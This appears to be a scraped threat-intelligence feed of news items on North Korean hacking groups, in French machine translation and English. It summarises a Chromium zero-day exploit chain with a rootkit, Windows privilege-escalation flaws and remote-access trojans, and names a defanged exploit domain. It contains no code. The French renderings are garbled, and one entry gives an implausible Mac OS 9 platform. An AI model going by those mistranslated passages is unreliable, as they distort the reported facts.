rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc)Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou lorsque Micr | Ransomware Malware Tool Threat | APT 38 | ★★ |
|
2024-09-03 14:00:00 | ATTENTIONS DÉFÉRENCES - Examiner les cambriolages Web3 DeFied Expectations - Examining Web3 Heists (lien direct) |
Written by: Robert Wallace, Blas Kojusner, Joseph Dobson
Where money goes, crime follows. The rapid growth of Web3 has presented new opportunities for threat actors, especially in decentralized finance (DeFi), where the heists are larger and more numerous than anything seen in the traditional finance sector. Mandiant has a long history of investigating bank heists. In 2016, Mandiant investigated the world\'s largest bank heist that occurred at the Bank of Bangladesh and resulted in the theft of $81 million by North Korea\'s APT38. While the group\'s operations were quite innovative and made for an entertaining 10-episode podcast by the BBC, it pales in comparison to Web3 heists. In 2022, the largest DeFi heist occurred on Sky Mavis\' Ronin Blockchain, which resulted in the theft of over $600 million by North Korean threat actors. While North Korea is arguably the world\'s leading cyber criminal enterprise, they are not the only player. Since 2020, there have been hundreds of Web3 heists reported, which has resulted in over $12 billion in stolen digital assets 
Source: Chainalysis 2024 Crypto Crime Report
While social engineering, crypto drainers, rug pulls (scams), and |
Malware Hack Vulnerability Threat Cloud | APT 38 | ★★ |
|
2024-09-02 16:43:39 | 2022-2024 Corée du Nord Citrine Citrine Sleet / Lazarus Fudmodule (BYOVD) ROOTKIT Samples 2022-2024 North Korea Citrine Sleet /Lazarus FUDMODULE ( BYOVD ) Rootkit Samples (lien direct) |
Vulnerability Threat Conference | APT 38 | ★★ | |
|
2024-08-29 19:44:20 | Sleet citrine exploitant le chrome zéro-jour Citrine Sleet exploiting Chromium zero-day (lien direct) |
#### Targeted Industries - Financial Services ## Snapshot On August 19, 2024, Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as [CVE-2024-7971](https://nvd.nist.gov/vuln/detail/CVE-2024-7971), to gain remote code execution (RCE). We assess with high confidence that the observed exploitation of CVE-2024-7971 can be attributed to a North Korean threat actor targeting the cryptocurrency sector for financial gain. Our ongoing analysis and observed infrastructure lead us to attribute this activity with medium confidence to [Citrine Sleet](https://security.microsoft.com/intel-profiles/740afa51582ebef367a7120efe99a535ba803f2169356580369a0fd680137145). We note that while the [FudModule](https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/) rootkit deployed in the attack has also been attributed to [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5), another North Korean threat actor, Microsoft previously identified shared infrastructure and tools between Diamond Sleet and Citrine Sleet, and our analysis indicates this might be shared use of the FudModule malware between these threat actors. Google released a [fix for the vulnerability](https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html) on August 21, 2024, and users should ensure they are using the latest version of Chromium. Microsoft Defender for Endpoint detects Citrine Sleet activity with the alert *Emerging threat activity group Citrine Sleet detected*. To further protect from this kind of attack, organizations should ensure that Google Chrome and Microsoft Edge are updated and follow Microsoft\'s recommendations below in strengthening the endpoint. ## Activity Overview On August 19, 2024, Microsoft identified a North Korean threat actor exploiting an RCE exploit in the Chromium browser that has since been designated CVE-2024-7971. Entities that we identified who were targeted through this vector are associated with the cryptocurrency sector. One of these organizations is also a previous target of Sapphire Sleet. CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21. CVE-2024-7971 is the third exploited V8 type confusion vulnerability that has been patched in V8 this year after [CVE-2024-4947](https://nvd.nist.gov/vuln/detail/CVE-2024-4947) and [CVE-2024-5274](https://nvd.nist.gov/vuln/detail/CVE-2024-5274). The attack used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain *voyagorclub\[.\]space*. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served. After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded and then loaded into memory. The sandbox escape exploited [CVE-2024-38106](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38106), a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before we discovered this North Korean threat actor activity. CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a "bug collision," where the same vulnerability is independentl | Malware Tool Vulnerability Threat | APT 38 | ★★ |
|
2024-08-29 10:04:45 | Nukesped (lien direct) | > également connu sous le nom de heur: trojan-psw.osx.beavertail.a
Type:
Menace hybride
Plateforme:
Mac OS 9
Dernière mise à jour:
07/31/24 15:52 PM
Niveau de menace:
High
Description
Nukesped est une menace hybride qui est attribuée au groupe nord-coréen Lazare, est un outil de cyber-espionnage avancé conçu pour voler des données sensibles et perturber les opérations. .
Retrait des menaces nuclées
MacScan peut détecter et éliminer la menace hybride nucléaire de votre système, ainsi que de protéger d'autres menaces de sécurité et de confidentialité.Un essai de 30 jours est disponible pour scanner votre système pour cette menace.
télécharger macscan
>also known as HEUR:Trojan-PSW.OSX.BeaverTail.a Type: Hybrid Threat Platform: Mac OS 9 Last updated: 07/31/24 3:52 pm Threat Level: High Description Nukesped is a hybrid threat that is attributed to the North Korean Lazarus Group, is an advanced cyber espionage tool designed to steal sensitive data and disrupt operations. Nukesped Threat Removal MacScan can detect and remove Nukesped Hybrid Threat from your system, as well as provide protection against other security and privacy threats. A 30-day trial is available to scan your system for this threat. Download MacScan |
Tool Threat | APT 38 | ★★★ |
|
2024-08-19 15:35:53 | Attaque de Windows Zero-Day liée à la Corée du Nord Lazarus Apt Windows Zero-Day Attack Linked to North Korea\\'s Lazarus APT (lien direct) |
> La vulnérabilité, suivie en CVE-2024-38193 et marquée comme \\ 'activement exploitée \' par Microsoft, permet des privilèges système sur les derniers systèmes d'exploitation Windows.
>The vulnerability, tracked as CVE-2024-38193 and marked as \'actively exploited\' by Microsoft, allows SYSTEM privileges on the latest Windows operating systems. |
Vulnerability Threat | APT 38 | ★★ |
|
2024-08-19 12:35:00 | Microsoft Patches Flaw Zero-Day exploitée par le groupe de Lazarus de la Corée du Nord Microsoft Patches Zero-Day Flaw Exploited by North Korea\\'s Lazarus Group (lien direct) |
Une faille de sécurité nouvellement corrigée à Microsoft Windows a été exploitée en tant que groupe zéro-jour par Lazarus, un acteur prolifique parrainé par l'État affilié à la Corée du Nord.
La vulnérabilité de sécurité, suivie sous le nom de CVE-2024-38193 (score CVSS: 7.8), a été décrite comme un bug d'escalade de privilège dans le pilote de fonction auxiliaire Windows (AFD.SYS) pour Winsock.
"Un attaquant qui a réussi à exploiter cela
A newly patched security flaw in Microsoft Windows was exploited as a zero-day by Lazarus Group, a prolific state-sponsored actor affiliated with North Korea. The security vulnerability, tracked as CVE-2024-38193 (CVSS score: 7.8), has been described as a privilege escalation bug in the Windows Ancillary Function Driver (AFD.sys) for WinSock. "An attacker who successfully exploited this |
Vulnerability Threat | APT 38 | ★★★ |
|
2024-07-24 23:34:10 | Onyx Sleet utilise une gamme de logiciels malveillants pour recueillir l'intelligence pour la Corée du Nord Onyx Sleet uses array of malware to gather intelligence for North Korea (lien direct) |
#### Targeted Geolocations - India - Korea - United States - Southeast Asia - North America #### Targeted Industries - Information Technology - Defense Industrial Base - Government Agencies & Services ## Snapshot On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. We will continue to closely monitor Onyx Sleet\'s activity to assess changes following the indictment. First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet\'s ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors. Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. ## Activity Overview ### Who is Onyx Sleet? Onyx Sleet conducts cyber espionage primarily targeting military, defense, and technology industries, predominately in India, South Korea, and the United States. This threat actor has historically leveraged spear-phishing as a means of compromising target environments; however, in recent campaigns, they have mostly exploited N-day vulnerabilities, leveraging publicly available and custom exploits to gain initial access. In October 2023, Onyx Sleet [exploited the TeamCity CVE-2023-42793 vulnerability](https://security.microsoft.com/intel-explorer/articles/b4f39b04) [as a part of a targeted attack](https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2023-42793/overview). Exploiting this vulnerability enabled the threat actor to perform a remote code execution attack and gain administrative control of the server. Onyx Sleet develops and uses a spectrum of tools that range from custom to open source. They have built an extensive set of custom remote access trojans (RATs) that they use in campaigns, and routinely developed new variants of these RATs to add new functionality and implement new ways of evading detection. Onyx Sleet often uses leased virtual private servers (VPS) and compromised cloud infrastructure for command-and-control (C2). Onyx Sleet is tracked by other security companies as SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, and TDrop2. **Affiliations with other threat actors originating from North Korea** Onyx Sleet has demonstrated affiliations with other North Korean actors, indicating its integration with a broader network of North Korean cyber operations. Microsoft has observed [an overlap](https://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/) between Onyx Sleet and [Storm-0530](https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/). Both groups were observed operating within the same infrastructure and were involved in the development and use of ransomware in attacks in late 2021 and 2022. **Onyx Sleet targets** In pursuit of its primary goal of intelligence collection, Onyx Sleet has focused on targeting entities in the defense and energy industries, predominately in India, South Korea, and the United States. Recent att | Ransomware Malware Tool Vulnerability Threat Industrial Cloud Technical Commercial | APT 38 | ★★★ |
|
2024-06-27 14:00:00 | Le renouveau mondial du hacktivisme nécessite une vigilance accrue des défenseurs Global Revival of Hacktivism Requires Increased Vigilance from Defenders (lien direct) |
Written by: Daniel Kapellmann Zafra, Alden Wahlstrom, James Sadowski, Josh Palatucci, Davyn Baumann, Jose Nazario
Since early 2022, Mandiant has observed the revival and intensification of threat activity from actors leveraging hacktivist tactics and techniques. This comes decades after hacktivism first emerged as a form of online activism and several years since many defenders last considered hacktivism to be a serious threat. However, this new generation of hacktivism has grown to encompass a more complex and often impactful fusion of tactics different actors leverage for their specific objectives. Today\'s hacktivists exhibit increased capabilities in both intrusion and information operations demonstrated by a range of activities such as executing massive disruptive attacks, compromising networks to leak information, conducting information operations, and even tampering with physical world processes. They have leveraged their skills to gain notoriety and reputation, promote political ideologies, and actively support the strategic interests of nation-states. The anonymity provided by hacktivist personas coupled with the range of objectives supported by hacktivist tactics have made them a top choice for both state and non-state actors seeking to exert influence through the cyber domain. This blog post presents Mandiant\'s analysis of the hacktivism threat landscape, and provides analytical tools to understand and assess the level of risk posed by these groups. Based on years of experience tracking hacktivist actors, their claims, and attacks, our insight is meant to help organizations understand and prioritize meaningful threat activity against their own networks and equities. 
Figure 1: Sample of imagery used by hacktivists to promote their threat activity
Proactive Monitoring of Hacktivist Threats Necessary for Defenders to Anticipate Cyberattacks
Mandiant considers activity to be hacktivism when actors claim to or conduct attacks with the publicly stated intent of engaging in political or social activism. The large scale of hacktivism\'s resurgence presents a critical challenge to defenders who need to proactively sift through the noise and assess the risk posed by a multitude of actors with ranging degrees of sophistication. While in many cases hacktivist activity represents a marginal threat, in the most significant hacktivist operations Mandiant has tracked, threat actors have deliberately layered multiple tactics in hybrid operations in such a way that the effect of each component magnified the others. In some cases, hacktivist tactics have been deliberately employed by nation-state actors to support hybrid operations that can seriously harm victims. As the volume and complexity of activity grows and new actors leverage hacktivist tactics, defenders must determine how to filter, assess, and neutralize a range of novel and evolving threats. The proactive moni |
Malware Tool Threat Legislation Industrial Cloud Commercial | APT 38 | ★★★ |
|
2024-05-31 22:14:46 | Analysis of APT Attack Cases Using Dora RAT Against Korean Companies (Andariel Group) (lien direct) | #### Géolocations ciblées - Corée #### Industries ciblées - Éducation - Fabrication critique ## Instantané Ahnlab Security Intelligence Center (ASEC) a identifié des attaques par Andariel Group, suivis par Microsof une variété de logiciels malveillants pour cibler l'éducation sud-coréenneInstitutions et organisations de construction et de fabrication. Lire Microsoft \'s [écriture sur Onyx Sleet] (https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0). ## Description Les attaques analysées par l'ASEC ont impliqué plusieurs types de logiciels malveillants, tels que les keyloggers, les infostelleurs, les outils de proxy et les chevaux de Troie à distance à distance (rats). Nestdoor est un rat qui est utilisé depuis mai 2022. Il permet aux attaquants d'exécuter des commandes, de télécharger et de télécharger des fichiers et d'effectuer des opérations de shell inverse.Nestdoor a été utilisé dans diverses attaques, exploitant souvent des vulnérabilités comme Log4Shell.Dans un cas, les logiciels malveillants étaient déguisés en un installateur OpenVPN, qui, lors de l'exécution, a activé Nestdoor. Dora Rat est une souche malveillante personnalisée identifiée dans ces attaques.Développé par Andariel Group dans le langage Go, Dora Rat fournit des fonctionnalités de base telles que le transfert de shell et de fichiers inversé.Il peut soit s'exécuter en tant qu'exécutable autonome, soit être injecté dans le processus Explorer.exe.Certaines versions de Dora Rat ont été signées avec un certificat légitime, augmentant leur légitimité perçue. Les keyloggers et les journalistes du presse-papiers ont été déployés pour capturer des informations sensibles à partir de systèmes infectés, stockant les données capturées dans le répertoire "% temp%".De plus, divers outils proxy ont été utilisés pour l'exfiltration des données.Ces outils comprenaient des proxys développés sur mesure et des proxys de Socks5 open source.Un outil de proxy a partagé des similitudes avec ceux utilisés par le groupe Lazarus, suivi par Micross comme [Diamond Sleet] (https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5), ininte ## Détections / requêtes de chasse ** Microsoft Defender pour le point de terminaison ** Les alertes avec le titre suivant dans le centre de sécurité peuvent indiquer une activité de menace sur votre réseau: - * groupe d'activités de grésil Onyx * ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Utiliser [Microsoft Defender Vulnerabilité Management (MDVM] (https: //learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/defender-vulnerabilité-management?view=o365-worldwide)) pour aider à identifier le potAssets entialement vulnérables Les acteurs de Sleet Onyx pourraient exploiter pour prendre pied dans le réseau. - Utiliser la gestion de l'exposition dans [Microsoft Defender XDR] (https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint?view=O365-Worldwide) pour identifier)Les actifs potentiellement vulnérables et remédier aux vulnérabilités potentielles de sécurité Les acteurs de goûts d'Onyx pourraient exploiter pour prendre pied dans le réseau. - Les clients de Microsoft Defender peuvent activer [Règles de réduction de la surface d'attaque] (https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide&ocid = magicti_ta_learndoc) pour empêcher les techniques d'attaque courantes: - [Block] (https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-redulation-Rules-reference?view=o365-wor | Malware Tool Vulnerability Threat | APT 38 | ★★ |
|
2024-05-29 16:05:00 | Microsoft Uncovers \\ 'Moonstone Sheet \\' - Nouveau groupe de pirates nord Microsoft Uncovers \\'Moonstone Sleet\\' - New North Korean Hacker Group (lien direct) |
Un acteur de menace nord-coréen jamais vu auparavant, le nom de manche de Moonstone Sleet a été attribué comme derrière les cyberattaques ciblant les individus et les organisations dans les secteurs de base industrielle des technologies et des technologies de l'information, de l'éducation et de la défense avec un ransomware et un malware sur mesure auparavant associé au célèbre groupe Lazarus Lazare.
"On observe que le grésil de la pierre de lune installe de fausses entreprises et
A never-before-seen North Korean threat actor codenamed Moonstone Sleet has been attributed as behind cyber attacks targeting individuals and organizations in the software and information technology, education, and defense industrial base sectors with ransomware and bespoke malware previously associated with the infamous Lazarus Group. "Moonstone Sleet is observed to set up fake companies and |
Ransomware Malware Threat Industrial | APT 38 | ★★ |
To see everything:
Our RSS (filtrered)
